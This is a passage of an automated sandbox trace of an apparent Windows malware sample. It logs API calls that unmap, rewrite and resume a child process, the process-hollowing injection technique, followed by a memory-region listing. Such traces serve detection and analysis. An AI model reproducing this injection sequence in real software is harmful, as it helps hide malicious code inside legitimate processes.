FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x498550, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0070.095] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0070.095] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0070.203] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0070.211] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3d115a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3d115a0*, NumberOfBytesWritten=0x0) returned 0x0 [0070.251] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3d119a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3d119a0*, NumberOfBytesWritten=0x0) returned 0x0 [0070.306] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3ddbfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3ddbfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0070.349] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3e19ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3e19ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0070.391] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3e1ffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3e1ffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0070.421] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3e201a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3e201a0*, NumberOfBytesWritten=0x0) returned 0x0 [0070.450] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3d116ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3d116ec*, lpNumberOfBytesWritten=0x0) returned 1 [0070.451] SetThreadContext (hThread=0x74, lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0070.452] ResumeThread (hThread=0x74) returned 0x1 [0070.542] CloseHandle (hObject=0x74) returned 1 [0070.542] CloseHandle (hObject=0x78) returned 1 [0070.542] ExitProcess (uExitCode=0x0) [0070.542] HeapFree (in: hHeap=0x3f00000, dwFlags=0x0, lpMem=0x3f007d0 | out: hHeap=0x3f00000) returned 1 Process: id = "2" image_name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" page_root = "0x42be4000" os_pid = "0xee8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xee0" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 320 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 321 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 322 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 323 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 324 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 325 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 326 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498550 region_type = mapped_file name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") Region: id = 327 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 328 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 329 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 330 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 331 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 332 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 333 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 334 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 335 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 336 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 337 start_va = 0x1a0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 338 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 339 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 340 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 341 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 342 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 343 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 344 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 345 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 346 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 347 start_va = 0x540000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 348 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 349 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 350 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 351 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 352 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 353 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 354 start_va = 0x360000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 355 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 356 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 